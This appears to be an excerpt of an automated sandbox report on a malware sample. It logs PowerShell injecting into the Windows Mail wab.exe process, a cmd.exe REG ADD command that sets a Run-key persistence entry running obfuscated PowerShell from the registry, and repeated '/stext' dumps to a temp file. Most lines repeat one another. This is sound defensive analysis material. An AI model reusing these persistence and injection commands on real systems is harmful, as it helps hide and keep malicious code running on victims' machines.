              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2AEFD74Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
